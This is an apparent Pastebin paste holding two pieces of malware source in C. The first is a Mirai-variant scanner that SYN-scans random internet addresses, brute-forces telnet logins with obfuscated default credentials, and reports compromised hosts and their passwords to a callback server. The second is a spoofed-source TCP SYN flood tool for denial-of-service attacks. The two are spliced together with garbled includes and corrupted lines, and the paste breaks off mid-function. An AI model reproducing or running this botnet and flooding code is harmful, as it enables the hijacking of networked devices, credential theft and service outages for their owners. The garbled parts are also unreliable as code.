Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #define _GNU_SOURCE
- #ifdef Senthos_MIRAI
- #ifdef DEBUG
- #include <stdio.h>
- #endif
- #include <unistd.h>
- #include <stdlib.h>
- #include <sys/socket.h>
- #include <arpa/inet.h>
- #include <sys/select.h>
- #include <sys/types.h>
- #include <time.h>
- #include <fcntl.h>
- #include <signal.h>
- #include <errno.h>
- #include <string.h>
- #include <linux/ip.h>
- #include <linux/tcp.h>
- #include "includes.h"
- #include "scanner.h"
- #include "table.h"
- #include "rand.h"
- #include "util.h"
- #include "checksum.h"
- #include "resolv.h"
- int scanner_pid, rsck, rsck_out, auth_table_len = 0;
- char scanner_rawpkt[sizeof (struct iphdr) + sizeof (struct tcphdr)] = {0};
- struct scanner_auth *auth_table = NULL;
- struct scanner_connection *conn_table;
- uint16_t auth_table_max_weight = 0;
- uint32_t fake_time = 0;
- int recv_strip_null(int sock, void *buf, int len, int flags)
- {
- int ret = recv(sock, buf, len, flags);
- if (ret > 0)
- {
- int i = 0;
- for(i = 0; i < ret; i++)
- {
- if (((char *)buf)[i] == 0x00)
- {
- ((char *)buf)[i] = 'A';
- }
- }
- }
- return ret;
- }
- void scanner_init(void)
- {
- int i;
- uint16_t source_port;
- struct iphdr *iph;
- struct tcphdr *tcph;
- // Let parent continue on main thread
- scanner_pid = fork();
- if (scanner_pid > 0 || scanner_pid == -1)
- return;
- LOCAL_ADDR = util_local_addr();
- rand_init();
- fake_time = time(NULL);
- conn_table = calloc(SCANNER_MAX_CONNS, sizeof (struct scanner_connection));
- for (i = 0; i < SCANNER_MAX_CONNS; i++)
- {
- conn_table[i].state = SC_CLOSED;
- conn_table[i].fd = -1;
- }
- // Set up raw socket scanning and payload
- if ((rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)
- {
- #ifdef DEBUG
- printf("[scanner] Failed to initialize raw socket, cannot scan\n");
- #endif
- exit(0);
- }
- fcntl(rsck, F_SETFL, O_NONBLOCK | fcntl(rsck, F_GETFL, 0));
- i = 1;
- if (setsockopt(rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof (i)) != 0)
- {
- #ifdef DEBUG
- printf("[scanner] Failed to set IP_HDRINCL, cannot scan\n");
- #endif
- close(rsck);
- exit(0);
- }
- do
- {
- source_port = rand_next() & 0xffff;
- }
- while (ntohs(source_port) < 1024);
- iph = (struct iphdr *)scanner_rawpkt;
- tcph = (struct tcphdr *)(iph + 1);
- // Set up IPv4 header
- iph->ihl = 5;
- iph->version = 4;
- iph->tot_len = htons(sizeof (struct iphdr) + sizeof (struct tcphdr));
- iph->id = rand_next();
- iph->ttl = 64;
- iph->protocol = IPPROTO_TCP;
- // Set up TCP header
- tcph->dest = htons(23);
- tcph->source = source_port;
- tcph->doff = 5;
- tcph->window = rand_next() & 0xffff;
- tcph->syn = TRUE;
- // Set up passwords
- add_auth_entry("\x50\x4D\x4D\x56", "\x5A\x41\x11\x17\x13\x13", 10);
- #ifdef DEBUG
- printf("[scanner] Scanner process initialized. Scanning started.\n");
- #endif
- // Main logic loop
- while (TRUE)
- {
- fd_set fdset_rd, fdset_wr;
- struct scanner_connection *conn;
- struct timeval tim;
- int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;
- // Spew out SYN to try and get a response
- if (fake_time != last_spew)
- {
- last_spew = fake_time;
- for (i = 0; i < SCANNER_RAW_PPS; i++)
- {
- struct sockaddr_in paddr = {0};
- struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
- struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
- iph->id = rand_next();
- iph->saddr = LOCAL_ADDR;
- iph->daddr = get_random_ip();
- iph->check = 0;
- iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));
- if (i % 10 == 0)
- {
- tcph->dest = htons(2323);
- }
- else
- {
- tcph->dest = htons(23);
- }
- tcph->seq = iph->daddr;
- tcph->check = 0;
- tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof (struct tcphdr)), sizeof (struct tcphdr));
- paddr.sin_family = AF_INET;
- paddr.sin_addr.s_addr = iph->daddr;
- paddr.sin_port = tcph->dest;
- sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));
- }
- }
- // Read packets from raw socket to get SYN+ACKs
- last_avail_conn = 0;
- while (TRUE)
- {
- int n;
- char dgram[1514];
- struct iphdr *iph = (struct iphdr *)dgram;
- struct tcphdr *tcph = (struct tcphdr *)(iph + 1);
- struct scanner_connection *conn;
- errno = 0;
- n = recvfrom(rsck, dgram, sizeof (dgram), MSG_NOSIGNAL, NULL, NULL);
- if (n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)
- break;
- if (n < sizeof(struct iphdr) + sizeof(struct tcphdr))
- continue;
- if (iph->daddr != LOCAL_ADDR)
- continue;
- if (iph->protocol != IPPROTO_TCP)
- continue;
- if (tcph->source != htons(23) && tcph->source != htons(2323))
- continue;
- if (tcph->dest != source_port)
- continue;
- if (!tcph->syn)
- continue;
- if (!tcph->ack)
- continue;
- if (tcph->rst)
- continue;
- if (tcph->fin)
- continue;
- if (htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
- continue;
- conn = NULL;
- for (n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)
- {
- if (conn_table[n].state == SC_CLOSED)
- {
- conn = &conn_table[n];
- last_avail_conn = n;
- break;
- }
- }
- // If there were no slots, then no point reading any more
- if (conn == NULL)
- break;
- conn->dst_addr = iph->saddr;
- conn->dst_port = tcph->source;
- setup_connection(conn);
- #ifdef DEBUG
- printf("[scanner] FD%d Attempting to brute found IP %d.%d.%d.%d\n", conn->fd, iph->saddr & 0xff, (iph->saddr >> 8) & 0xff, (iph->saddr >> 16) & 0xff, (iph->saddr >> 24) & 0xff);
- #endif
- }
- // Load file descriptors into fdsets
- FD_ZERO(&fdset_rd);
- FD_ZERO(&fdset_wr);
- for (i = 0; i < SCANNER_MAX_CONNS; i++)
- {
- int timeout;
- conn = &conn_table[i];
- timeout = (conn->state > SC_CONNECTING ? 30 : 5);
- if (conn->state != SC_CLOSED && (fake_time - conn->last_recv) > timeout)
- {
- #ifdef DEBUG
- printf("[scanner] FD%d timed out (state = %d)\n", conn->fd, conn->state);
- #endif
- close(conn->fd);
- conn->fd = -1;
- // Retry
- if (conn->state > SC_HANDLE_IACS) // If we were at least able to connect, try again
- {
- if (++(conn->tries) == 10)
- {
- conn->tries = 0;
- conn->state = SC_CLOSED;
- }
- else
- {
- setup_connection(conn);
- #ifdef DEBUG
- printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
- #endif
- }
- }
- else
- {
- conn->tries = 0;
- conn->state = SC_CLOSED;
- }
- continue;
- }
- if (conn->state == SC_CONNECTING)
- {
- FD_SET(conn->fd, &fdset_wr);
- if (conn->fd > mfd_wr)
- mfd_wr = conn->fd;
- }
- else if (conn->state != SC_CLOSED)
- {
- FD_SET(conn->fd, &fdset_rd);
- if (conn->fd > mfd_rd)
- mfd_rd = conn->fd;
- }
- }
- tim.tv_usec = 0;
- tim.tv_sec = 1;
- nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);
- fake_time = time(NULL);
- for (i = 0; i < SCANNER_MAX_CONNS; i++)
- {
- conn = &conn_table[i];
- if (conn->fd == -1)
- continue;
- if (FD_ISSET(conn->fd, &fdset_wr))
- {
- int err = 0, ret = 0;
- socklen_t err_len = sizeof (err);
- ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);
- if (err == 0 && ret == 0)
- {
- conn->state = SC_HANDLE_IACS;
- conn->auth = random_auth_entry();
- conn->rdbuf_pos = 0;
- #ifdef DEBUG
- printf("[scanner] FD%d connected. Trying %s:%s\n", conn->fd, conn->auth->username, conn->auth->password);
- #endif
- }
- else
- {
- #ifdef DEBUG
- printf("[scanner] FD%d error while connecting = %d\n", conn->fd, err);
- #endif
- close(conn->fd);
- conn->fd = -1;
- conn->tries = 0;
- conn->state = SC_CLOSED;
- continue;
- }
- }
- if (FD_ISSET(conn->fd, &fdset_rd))
- {
- while (TRUE)
- {
- int ret;
- if (conn->state == SC_CLOSED)
- break;
- if (conn->rdbuf_pos == SCANNER_RDBUF_SIZE)
- {
- memmove(conn->rdbuf, conn->rdbuf + SCANNER_HACK_DRAIN, SCANNER_RDBUF_SIZE - SCANNER_HACK_DRAIN);
- conn->rdbuf_pos -= SCANNER_HACK_DRAIN;
- }
- errno = 0;
- ret = recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);
- if (ret == 0)
- {
- #ifdef DEBUG
- printf("[scanner] FD%d connection gracefully closed\n", conn->fd);
- #endif
- errno = ECONNRESET;
- ret = -1; // Fall through to closing connection below
- }
- if (ret == -1)
- {
- if (errno != EAGAIN && errno != EWOULDBLOCK)
- {
- #ifdef DEBUG
- printf("[scanner] FD%d lost connection\n", conn->fd);
- #endif
- close(conn->fd);
- conn->fd = -1;
- // Retry
- if (++(conn->tries) >= 10)
- {
- conn->tries = 0;
- conn->state = SC_CLOSED;
- }
- else
- {
- setup_connection(conn);
- #ifdef DEBUG
- printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
- #endif
- }
- }
- break;
- }
- conn->rdbuf_pos += ret;
- conn->last_recv = fake_time;
- while (TRUE)
- {
- int consumed = 0;
- switch (conn->state)
- {
- case SC_HANDLE_IACS:
- if ((consumed = consume_iacs(conn)) > 0)
- {
- conn->state = SC_WAITING_USERNAME;
- #ifdef DEBUG
- printf("[scanner] FD%d finished telnet negotiation\n", conn->fd);
- #endif
- }
- break;
- case SC_WAITING_USERNAME:
- if ((consumed = consume_user_prompt(conn)) > 0)
- {
- send(conn->fd, conn->auth->username, conn->auth->username_len, MSG_NOSIGNAL);
- send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
- conn->state = SC_WAITING_PASSWORD;
- #ifdef DEBUG
- printf("[scanner] FD%d received username prompt\n", conn->fd);
- #endif
- }
- break;
- case SC_WAITING_PASSWORD:
- if ((consumed = consume_pass_prompt(conn)) > 0)
- {
- #ifdef DEBUG
- printf("[scanner] FD%d received password prompt\n", conn->fd);
- #endif
- // Send password
- send(conn->fd, conn->auth->password, conn->auth->password_len, MSG_NOSIGNAL);
- send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
- conn->state = SC_WAITING_PASSWD_RESP;
- }
- break;
- case SC_WAITING_PASSWD_RESP:
- if ((consumed = consume_any_prompt(conn)) > 0)
- {
- char *tmp_str;
- int tmp_len;
- #ifdef DEBUG
- printf("[scanner] FD%d received shell prompt\n", conn->fd);
- #endif
- // Send enable / system / shell / sh to session to drop into shell if needed
- table_unlock_val(TABLE_SCAN_ENABLE);
- tmp_str = table_retrieve_val(TABLE_SCAN_ENABLE, &tmp_len);
- send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
- send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
- table_lock_val(TABLE_SCAN_ENABLE);
- conn->state = SC_WAITING_ENABLE_RESP;
- }
- break;
- case SC_WAITING_ENABLE_RESP:
- if ((consumed = consume_any_prompt(conn)) > 0)
- {
- char *tmp_str;
- int tmp_len;
- #ifdef DEBUG
- printf("[scanner] FD%d received sh prompt\n", conn->fd);
- #endif
- table_unlock_val(TABLE_SCAN_SYSTEM);
- tmp_str = table_retrieve_val(TABLE_SCAN_SYSTEM, &tmp_len);
- send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
- send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
- table_lock_val(TABLE_SCAN_SYSTEM);
- conn->state = SC_WAITING_SYSTEM_RESP;
- }
- break;
- case SC_WAITING_SYSTEM_RESP:
- if ((consumed = consume_any_prompt(conn)) > 0)
- {
- char *tmp_str;
- int tmp_len;
- #ifdef DEBUG
- printf("[scanner] FD%d received sh prompt\n", conn->fd);
- #endif
- table_unlock_val(TABLE_SCAN_SHELL);
- tmp_str = table_retrieve_val(TABLE_SCAN_SHELL, &tmp_len);
- send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
- send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
- table_lock_val(TABLE_SCAN_SHELL);
- conn->state = SC_WAITING_SHELL_RESP;
- }
- break;
- case SC_WAITING_SHELL_RESP:
- if ((consumed = consume_any_prompt(conn)) > 0)
- {
- char *tmp_str;
- int tmp_len;
- #ifdef DEBUG
- printf("[scanner] FD%d received enable prompt\n", conn->fd);
- #endif
- table_unlock_val(TABLE_SCAN_SH);
- tmp_str = table_retrieve_val(TABLE_SCAN_SH, &tmp_len);
- send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
- send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
- table_lock_val(TABLE_SCAN_SH);
- conn->state = SC_WAITING_SH_RESP;
- }
- break;
- case SC_WAITING_SH_RESP:
- if ((consumed = consume_any_prompt(conn)) > 0)
- {
- char *tmp_str;
- int tmp_len;
- #ifdef DEBUG
- printf("[scanner] FD%d received sh prompt\n", conn->fd);
- #endif
- // Send query string
- table_unlock_val(TABLE_SCAN_QUERY);
- tmp_str = table_retrieve_val(TABLE_SCAN_QUERY, &tmp_len);
- send(conn->fd, tmp_str, tmp_len, MSG_NOSIGNAL);
- send(conn->fd, "\r\n", 2, MSG_NOSIGNAL);
- table_lock_val(TABLE_SCAN_QUERY);
- conn->state = SC_WAITING_TOKEN_RESP;
- }
- break;
- case SC_WAITING_TOKEN_RESP:
- consumed = consume_resp_prompt(conn);
- if (consumed == -1)
- {
- #ifdef DEBUG
- printf("[scanner] FD%d invalid username/password combo\n", conn->fd);
- #endif
- close(conn->fd);
- conn->fd = -1;
- // Retry
- if (++(conn->tries) == 10)
- {
- conn->tries = 0;
- conn->state = SC_CLOSED;
- }
- else
- {
- setup_connection(conn);
- #ifdef DEBUG
- printf("[scanner] FD%d retrying with different auth combo!\n", conn->fd);
- #endif
- }
- }
- else if (consumed > 0)
- {
- char *tmp_str;
- int tmp_len;
- #ifdef DEBUG
- printf("[scanner] FD%d Found verified working telnet\n", conn->fd);
- #endif
- report_working(conn->dst_addr, conn->dst_port, conn->auth);
- close(conn->fd);
- conn->fd = -1;
- conn->state = SC_CLOSED;
- }
- break;
- default:
- consumed = 0;
- break;
- }
- // If no data was consumed, move on
- if (consumed == 0)
- break;
- else
- {
- if (consumed > conn->rdbuf_pos)
- consumed = conn->rdbuf_pos;
- conn->rdbuf_pos -= consumed;
- memmove(conn->rdbuf, conn->rdbuf + consumed, conn->rdbuf_pos);
- }
- }
- }
- }
- }
- }
- }
- void scanner_kill(void)
- {
- kill(scanner_pid, 9);
- }
- static void setup_connection(struct scanner_connection *conn)
- {
- struct sockaddr_in addr = {0};
- if (conn->fd != -1)
- close(conn->fd);
- if ((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
- {
- #ifdef DEBUG
- printf("[scanner] Failed to call socket()\n");
- #endif
- return;
- }
- conn->rdbuf_pos = 0;
- util_zero(conn->rdbuf, sizeof(conn->rdbuf));
- fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));
- addr.sin_family = AF_INET;
- addr.sin_addr.s_addr = conn->dst_addr;
- addr.sin_port = conn->dst_port;
- conn->last_recv = fake_time;
- conn->state = SC_CONNECTING;
- connect(conn->fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in));
- }
- static ipv4_t get_random_ip(void)
- {
- uint32_t tmp;
- uint8_t o1, o2, o3, o4;
- do
- {
- tmp = rand_next();
- o1 = tmp & 0xff;
- o2 = (tmp >> 8) & 0xff;
- o3 = (tmp >> 16) & 0xff;
- o4 = (tmp >> 24) & 0xff;
- }
- while (o1 == 127 || // 127.0.0.0/8 - Loopback
- (o1 == 0) || // 0.0.0.0/8 - Invalid address space
- (o1 == 3) || // 3.0.0.0/8 - General Electric Company
- (o1 == 15 || o1 == 16) || // 15.0.0.0/7 - Hewlett-Packard Company
- (o1 == 56) || // 56.0.0.0/8 - US Postal Service
- (o1 == 10) || // 10.0.0.0/8 - Internal network
- (o1 == 192 && o2 == 168) || // 192.168.0.0/16 - Internal network
- (o1 == 172 && o2 >= 16 && o2 < 32) || // 172.16.0.0/14 - Internal network
- (o1 == 100 && o2 >= 64 && o2 < 127) || // 100.64.0.0/10 - IANA NAT reserved
- (o1 == 169 && o2 > 254) || // 169.254.0.0/16 - IANA NAT reserved
- (o1 == 198 && o2 >= 18 && o2 < 20) || // 198.18.0.0/15 - IANA Special use
- (o1 >= 224) || // 224.*.*.*+ - Multicast
- (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
- );
- return INET_ADDR(o1,o2,o3,o4);
- }
- static int consume_iacs(struct scanner_connection *conn)
- {
- int consumed = 0;
- uint8_t *ptr = conn->rdbuf;
- while (consumed < conn->rdbuf_pos)
- {
- int i;
- if (*ptr != 0xff)
- break;
- else if (*ptr == 0xff)
- {
- if (!can_consume(conn, ptr, 1))
- break;
- if (ptr[1] == 0xff)
- {
- ptr += 2;
- consumed += 2;
- continue;
- }
- else if (ptr[1] == 0xfd)
- {
- uint8_t tmp1[3] = {255, 251, 31};
- uint8_t tmp2[9] = {255, 250, 31, 0, 80, 0, 24, 255, 240};
- if (!can_consume(conn, ptr, 2))
- break;
- if (ptr[2] != 31)
- goto iac_wont;
- ptr += 3;
- consumed += 3;
- send(conn->fd, tmp1, 3, MSG_NOSIGNAL);
- send(conn->fd, tmp2, 9, MSG_NOSIGNAL);
- }
- else
- {
- iac_wont:
- if (!can_consume(conn, ptr, 2))
- break;
- for (i = 0; i < 3; i++)
- {
- if (ptr[i] == 0xfd)
- ptr[i] = 0xfc;
- else if (ptr[i] == 0xfb)
- ptr[i] = 0xfd;
- }
- send(conn->fd, ptr, 3, MSG_NOSIGNAL);
- ptr += 3;
- consumed += 3;
- }
- }
- }
- return consumed;
- }
- static int consume_any_prompt(struct scanner_connection *conn)
- {
- char *pch;
- int i, prompt_ending = -1;
- for (i = conn->rdbuf_pos - 1; i > 0; i--)
- {
- if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
- {
- prompt_ending = i + 1;
- break;
- }
- }
- if (prompt_ending == -1)
- return 0;
- else
- return prompt_ending;
- }
- static int consume_user_prompt(struct scanner_connection *conn)
- {
- char *pch;
- int i, prompt_ending = -1;
- for (i = conn->rdbuf_pos - 1; i > 0; i--)
- {
- if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
- {
- prompt_ending = i + 1;
- break;
- }
- }
- if (prompt_ending == -1)
- {
- int tmp;
- if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "ogin", 4)) != -1)
- prompt_ending = tmp;
- else if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "enter", 5)) != -1)
- prompt_ending = tmp;
- }
- if (prompt_ending == -1)
- return 0;
- else
- return prompt_ending;
- }
- static int consume_pass_prompt(struct scanner_connection *conn)
- {
- char *pch;
- int i, prompt_ending = -1;
- for (i = conn->rdbuf_pos - 1; i > 0; i--)
- {
- if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#')
- {
- prompt_ending = i + 1;
- break;
- }
- }
- if (prompt_ending == -1)
- {
- int tmp;
- if ((tmp = util_memsearch(conn->rdbuf, conn->rdbuf_pos, "assword", 7)) != -1)
- prompt_ending = tmp;
- }
- if (prompt_ending == -1)
- return 0;
- else
- return prompt_ending;
- }
- static int consume_resp_prompt(struct scanner_connection *conn)
- {
- char *tkn_resp;
- int prompt_ending, len;
- table_unlock_val(TABLE_SCAN_NCORRECT);
- tkn_resp = table_retrieve_val(TABLE_SCAN_NCORRECT, &len);
- if (util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1) != -1)
- {
- table_lock_val(TABLE_SCAN_NCORRECT);
- return -1;
- }
- table_lock_val(TABLE_SCAN_NCORRECT);
- table_unlock_val(TABLE_SCAN_RESP);
- tkn_resp = table_retrieve_val(TABLE_SCAN_RESP, &len);
- prompt_ending = util_memsearch(conn->rdbuf, conn->rdbuf_pos, tkn_resp, len - 1);
- table_lock_val(TABLE_SCAN_RESP);
- if (prompt_ending == -1)
- return 0;
- else
- return prompt_ending;
- }
- static void add_auth_entry(char *enc_user, char *enc_pass, uint16_t weight)
- {
- int tmp;
- auth_table = realloc(auth_table, (auth_table_len + 1) * sizeof (struct scanner_auth));
- auth_table[auth_table_len].username = deobf(enc_user, &tmp);
- auth_table[auth_table_len].username_len = (uint8_t)tmp;
- auth_table[auth_table_len].password = deobf(enc_pass, &tmp);
- auth_table[auth_table_len].password_len = (uint8_t)tmp;
- auth_table[auth_table_len].weight_min = auth_table_max_weight;
- auth_table[auth_table_len++].weight_max = auth_table_max_weight + weight;
- auth_table_max_weight += weight;
- }
- static struct scanner_auth *random_auth_entry(void)
- {
- int i;
- uint16_t r = (uint16_t)(rand_next() % auth_table_max_weight);
- for (i = 0; i < auth_table_len; i++)
- {
- if (r < auth_table[i].weight_min)
- continue;
- else if (r < auth_table[i].weight_max)
- return &auth_table[i];
- }
- return NULL;
- }
- static void report_working(ipv4_t daddr, uint16_t dport, struct scanner_auth *auth)
- {
- struct sockaddr_in addr;
- int pid = fork(), fd;
- struct resolv_entries *entries = NULL;
- if (pid > 0 || pid == -1)
- return;
- if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
- {
- #ifdef DEBUG
- printf("[report] Failed to call socket()\n");
- #endif
- exit(0);
- }
- table_unlock_val(TABLE_SCAN_CB_DOMAIN);
- table_unlock_val(TABLE_SCAN_CB_PORT);
- entries = resolv_lookup(table_retrieve_val(TABLE_SCAN_CB_DOMAIN, NULL));
- if (entries == NULL)
- {
- #ifdef DEBUG
- printf("[report] Failed to resolve report address\n");
- #endif
- return;
- }
- addr.sin_family = AF_INET;
- addr.sin_addr.s_addr = entries->addrs[rand_next() % entries->addrs_len];
- addr.sin_port = *((port_t *)table_retrieve_val(TABLE_SCAN_CB_PORT, NULL));
- resolv_entries_free(entries);
- table_lock_val(TABLE_SCAN_CB_DOMAIN);
- table_lock_val(TABLE_SCAN_CB_PORT);
- if (connect(fd, (struct sockaddr *)&addr, sizeof (struct sockaddr_in)) == -1)
- {
- #ifdef DEBUG
- printf("[report] Failed to connect to scanner callback!\n");
- #endif
- close(fd);
- exit(0);
- }
- uint8_t zero = 0;
- send(fd, &zero, sizeof (uint8_t), MSG_NOSIGNAL);
- send(fd, &daddr, sizeof (ipv4_t), MSG_NOSIGNAL);
- send(fd, &dport, sizeof (uint16_t), MSG_NOSIGNAL);
- send(fd, &(auth->username_len), sizeof (uint8_t), MSG_NOSIGNAL);
- send(fd, auth->username, auth->username_len, MSG_NOSIGNAL);
- send(fd, &(auth->password_len), sizeof (uint8_t), MSG_NOSIGNAL);
- send(fd, auth->password, auth->password_len, MSG_NOSIGNAL);
- #ifdef DEBUG
- printf("[report] Send scan result to loader\n");
- #endif
- close(fd);
- exit(0);
- }
- static char *deobf(char *str, int *len)
- {
- int i;
- char *cpy;
- *len = util_strlen(str);
- cpy = malloc(*len + 1);
- util_memcpy(cpy, str, *len + 1);
- for (i = 0; i < *len; i++)
- {
- cpy[i] ^= 0xDE;
- cpy[i] ^= 0xAD;
- cpy[i] ^= 0xBE;
- cpy[i] ^= 0xEF;
- }
- return cpy;
- }
- #include <pthread.h>#include <unistd.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#include <sys socket.h="">#include <netinet ip.h="">#include <netinet tcp.h="">#include <time.h>#define MAX_PACKET_SIZE 4096
- #define PHI 0x9e3779b9
- static unsigned long int Q[4096], c = 362436;
- static unsigned int floodport;
- volatile int limiter;
- volatile unsigned int pps;
- volatile unsigned int sleeptime = 100;
- void init_rand(unsigned long int x)
- {
- int i;
- Q[0] = x;
- Q[1] = x + PHI;
- Q[2] = x + PHI + PHI;
- for (i = 3; i < 4096; i++){ Q _= Q _^ Q _^ PHI ^ i; }
- }
- unsigned long int rand_cmwc(void)
- {
- unsigned long long int t, a = 18782LL;
- static unsigned long int i = 4095;
- unsigned long int x, r = 0xfffffffe;
- i = (i + 1) & 4095;
- t = a * Q _+ c;
- c = (t >> 32);
- x = t + c;
- if (x < c) {
- x++;
- c++;
- }
- return (Q _= r - x);
- }
- unsigned short csum (unsigned short *buf, int count)
- {
- register unsigned long sum = 0;
- while( count > 1 ) { sum += *buf++; count -= 2; }
- if(count > 0) { sum += *(unsigned char *)buf; }
- while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
- return (unsigned short)(~sum);
- }
- unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
- struct tcp_pseudo
- {
- unsigned long src_addr;
- unsigned long dst_addr;
- unsigned char zero;
- unsigned char proto;
- unsigned short length;
- } pseudohead;
- unsigned short total_len = iph->tot_len;
- pseudohead.src_addr=iph->saddr;
- pseudohead.dst_addr=iph->daddr;
- pseudohead.zero=0;
- pseudohead.proto=IPPROTO_TCP;
- pseudohead.length=htons(sizeof(struct tcphdr));
- int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
- unsigned short *tcp = malloc(totaltcp_len);
- memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
- memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
- unsigned short output = csum(tcp,totaltcp_len);
- free(tcp);
- return output;
- }
- void setup_ip_header(struct iphdr *iph)
- {
- char ip[17];
- snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
- iph->ihl = 5;
- iph->version = 4;
- iph->tos = 0;
- iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
- iph->id = htonl(rand()%54321);
- iph->frag_off = 0;
- iph->ttl = MAXTTL;
- iph->protocol = 6;
- iph->check = 0;
- iph->saddr = inet_addr(ip);
- }
- void setup_tcp_header(struct tcphdr *tcph)
- {
- tcph->source = htons(rand()%65535);
- tcph->seq = rand();
- tcph->ack_seq = 0;
- tcph->res2 = 0;
- tcph->doff = 5;
- tcph->syn = 1;
- tcph->window = htonl(65535);
- tcph->check = 0;
- tcph->urg_ptr = 0;
- }
- void *flood(void *par1)
- {
- char *td = (char *)par1;
- char datagram[MAX_PACKET_SIZE];
- struct iphdr *iph = (struct iphdr *)datagram;
- struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
- struct sockaddr_in sin;
- sin.sin_family = AF_INET;
- sin.sin_port = htons(floodport);
- sin.sin_addr.s_addr = inet_addr(td);
- int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
- if(s < 0){
- fprintf(stderr, "Could not open raw socket.\n");
- exit(-1);
- }
- memset(datagram, 0, MAX_PACKET_SIZE);
- setup_ip_header(iph);
- setup_tcp_header(tcph);
- tcph->dest = htons(floodport);
- iph->daddr = sin.sin_addr.s_addr;
- iph->check = csum ((unsigned short *) datagram, iph->tot_len);
- int tmp = 1;
- const int *val = &tmp;
- if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
- fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
- exit(-1);
- }
- init_rand(time(NULL));
- register unsigned int i;
- i = 0;
- while(1){
- sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
- setup_ip_header(iph);
- setup_tcp_header(tcph);
- iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
- iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
- tcph->dest = htons(floodport);
- iph->daddr = sin.sin_addr.s_addr;
- iph->check = csum ((unsigned short *) datagram, iph->tot_len);
- tcph->seq = rand_cmwc() & 0xFFFF;
- tcph->source = htons(rand_cmwc() & 0xFFFF);
- tcph->check = 0;
- tcph->check = tcpcsum(iph, tcph);
- pps++;
- if(i >= limiter)
- {
- i = 0;
- usleep(sleeptime);
- }
- i++;
- }
- }
- int main(int argc, char *argv[ ])
- {
- if(argc < 6){
- fprintf(stderr, "Invalid parameters!\n");
- fprintf(stdout, "SSYN Flooder by LSDEV\nImproved by Starfall\nUsage: %s <target ip=""><port to="" be="" flooded=""><number threads="" to="" use=""><pps limiter,="" -1="" for="" no="" limit=""><time>\n", argv[0]);
- exit(-1);
- }
- srand(time(0));
- fprintf(stdout, "Tank: So what do you need? Besides a miracle.\nNeo: Packets. Lots of packets.\n");
- int num_threads = atoi(argv[3]);
- floodport = atoi(argv[2]);
- int maxpps = atoi(argv[4]);
- limiter = 0;
- pps = 0;
- pthread_t thread[num_threads];
- int multiplier = 20;
- int i;
- for(i = 0;i<num_threads;i++){<br> pthread_create( &thread_, NULL, &flood, (void *)argv[1]);
- }
- for(i = 0;i<(atoi(argv[5])*multiplier);i++)
- {
- usleep((1000/multiplier)1000);
- if((ppsmultiplier) > maxpps)
- {
- if(1 > limiter)
- {
- sleeptime+=100;
- } else {
- limiter–;
